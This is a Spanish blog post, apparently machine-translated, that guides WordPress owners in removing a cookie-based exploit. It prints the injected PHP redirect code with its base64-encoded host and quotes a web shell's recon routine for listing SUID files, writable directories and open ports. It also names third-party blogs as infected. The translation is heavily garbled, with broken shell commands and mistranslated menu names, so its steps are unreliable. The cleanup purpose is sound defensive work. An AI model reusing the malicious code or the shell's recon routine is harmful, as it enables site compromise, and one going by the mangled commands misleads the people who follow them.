En el último mes, he recibido advertencias virus en el blog a partir de algunos visitantes. Al principio no hice caso de las advertencias, porque he instalado un muy buen antivirus (Kaspersky AV 2009) E incluso el blog desde hace mucho tiempo, nunca he recibido una alerta de virus (hace mucho tiempo .. vi algo sospechoso que la primera actualización desaparecido. Finalmente ...).
Poco a poco comenzó a mostrar grandes variaciones tráfico de visitantesDespués de que hace poco disminuido de manera constante tráfico y comenzó a ser cada vez más personas me dicen que stealthconfiguración.com es virused. Ayer recibí de alguien que hace una captura de pantalla cuando bloqueó un antivirus guión de stealthconfiguración.com:Trojan-Clicker.HTML.IFrame.gr. Fue muy convincente para mí, así que puse todas las fuentes buscadas. La primera idea que me vino a la mente fue hacer actualizar la última WordPress (2.5.1), pero no antes de eliminar todos los archivos en el antiguo script WordPress y hacer copia de seguridad de base de datos. Este procedimiento no funcionó y probablemente me tomó mucho tiempo averiguar dónde estaba el error, si no me lo hubiera dicho. Eugen en una discusión sobre el café, se encontró enlace Google y sería bueno verlo.
MyDigitalLife.info, publicó un artículo titulado: “WordPress Hack: recupere y corrija Google y el motor de búsqueda o el tráfico sin cookies redirigido a Your-Needs.info, AnyResults.Net, Golden-Info.net y otros sitios ilegales"Este es el final de la rosca que necesitaba.
Se trata de un explotar de WordPress a base de galletasLo que creo que es muy compleja e hizo el libro. Lo suficientemente inteligente como para hacer una SQL Injection Base de datos del Blog, para crear un usuario invisible una revisión de rutina sencilla Compras->Usuarios, revisar los directorios y archivos del servidor "grabables" (eso chmod 777), buscar y ejecutar archivos con los privilegios del grupo o de la raíz. No sé que explotan el nombre y ver que hay pocos artículos escritos sobre él, a pesar del hecho de que muchos blogs están infectados, incluyendo Rumania. Ok ... voy a tratar de intentar explicar las generalidades sobre el virus.
¿Qué es el virus?
Primero, inserte las páginas de fuentes en blogs, enlaces invisibles para los visitantes, pero visible e indexable para los buscadores, especialmente Google. De este modo transferencia sitios Page Rank indicadas por el atacante. En segundo lugar, se inserta otro redirección de código URL para los visitantes procedentes de Google, Live, Yahoo, ... o un lector de RSS y no el sitio en galleta. Una antivirus detecta la redirección como Trojan-Clicker.HTML.
Síntomas:
Disminución del tráfico de visitantes masivaEspecialmente en los blogs donde la mayoría de los visitantes provienen de Google.
Identificación: (aquí es donde el problema se complica para aquellos que no saben mucho sobre phpmyadmin, php y linux)
Los Ángeles. ADVERTENCIA! En primer lugar hacer una copia de seguridad de base de datos!
1. Compruebe los archivos de origen index.php, header.php, footer.php, El tema del blog y ver si hay un código que utiliza el cifrado base64 o contiene “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”en la forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>
... O algo así. Eliminar este código!
Haga clic en la foto ...
En la captura de pantalla anterior, seleccioné accidentalmente y " ". Ese código debe permanecer.
2. Utilizar phpMyAdmin y vaya a la tabla de base de datos wp_usersCuando compruebe que no hay ningún nombre de usuario creada en 00:00:00 0000-00-00 (Posible en el campo user_login escribir "WordPress”. Anote el ID de este usuario (campo ID) y luego elimínelo.
Haga clic en la foto ...
* La línea verde se debe quitar y retuvo su identificación. En el caso de los soñolientoFue ID = 8 .
3. Ir a la tabla wp_usermeta, ¿De dónde eres ubicado y limpiar líneas de ID (donde el campo user_id Valor ID se eliminan).
4. En la Tabla wp_option, Ir active_plugins y ver qué complemento está habilitado sospechoso. Se puede utilizar como terminaciones _old.giff, _old.pngg, _old.jpeg, _new.php.giff, etc. combinaciones de extensiones de imagen falsas con _old y _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'
Elimina este complemento, luego ve al blog -> Panel de control -> Complementos, donde desactivas y activas cualquier complemento.
Haga clic en la imagen para ver que aparece el archivo active_plugins virus.
Sigue el camino en el FTP o SSH, se indica en active_plugins y borrar el archivo desde el servidor.
5. También en phpMyAdmin, en la Tabla wp_option, Buscar y borrar la línea que contiene "rss_f541b3abd05e7962fcab37737f40fad8'Y'internal_links_cache ".
En internal_links_cache, ofreció enlaces de spam cifrados que aparecen en un blog código de Google Adsenseñar, El hacker.
6. Se recomienda a cambiar su contraseña Blog y login eliminar toda sospecha userele. Actualice a la última versión de WordPress y configurar el blog para que deje de registrar nuevos usuarios. No hay pérdida… también pueden comentar deshabitada.
Traté arriba de explicar un poco, qué hacer en tal situación, para limpiar el blog de este virus. El problema es mucho más grave de lo que parece y no está resuelto, porque se utilizan vulnerabilidades de seguridad que aloja el servidor web, que es el blog.
Como primera medida de seguridad, con acceso SSH, Hacer algunas comprobaciones en el servidor para ver si hay archivos del tipo * _old * y * _New. * Con terminaciones.giff,. jpeg,. pngg,. jpgg. Estos archivos se deben eliminar. Si cambia el nombre de un archivo, por ejemplo. top_right_old.giff in top_right_old.phpVemos que el archivo es exactamente el servidor de código de explotación.
Algunas instrucciones útiles para comprobar, limpiar y asegurar el servidor. (a través de SSH)
1. cd / tmp y comprobar si hay carpetas como tmpVFlma o cualquier otro nombre asemenatoare combinaciones y eliminarlo. Ver la imagen de abajo, dos dichas carpetas a mí:
rm-rf nombre de carpeta
2. Comprobar y eliminar (cambiar chmod-ul) como sea posible las carpetas con atributos chmod 777
encontrar todos los archivos de escritura en el directorio actual: Buscar. -Type f-perm-2-ls
encontrar todos los directorios escribibles en directorio actual: Buscar. Tipo-d-perm-2-ls
encuentre todos los directorios y archivos grabables en el directorio actual: Buscar. -Perm-2-ls
3. Buscando archivos sospechosos en el servidor.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"
4, ATENCIÓN !!! los archivos que se han fijado poco SUID si SGID. Estos archivos se ejecutan con los privilegios del usuario (grupo) o de raíz, no el usuario que ejecute el archivo. Estos archivos pueden llevar a un compromiso radical, si los problemas de seguridad. Si usted no utiliza los archivos SUID y SGID con poco, lleve a cabo "chmod 0 " ellos o desinstalar paquete que los contiene.
Explotar contiene algún lugar de la fuente ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}
Encuentra esa manera ... básicamente brechas de seguridad. Puertos abrir el directorio "escribir" y privilegios de grupo de ejecución los archivos / root.
De vuelta con más ...
Algunos blogs infectados: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motocicletas.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Y la lista continúa ... mucho.
Puede comprobar si un blog está infectado utilizando el motor de búsqueda de Google. copiar pegar:
Sitio: www.blegoo.com compra
Buenas noches y buen trabajo;) Pronto creo que Eugen vendrá con novedades, en prevezibil.imprevizibil.com.
brb :)
¡ATENCIÓN! Cambiando el tema de WordPress o actualizar a WordPress 2.5.1, NO es una solución para deshacerse de este virus.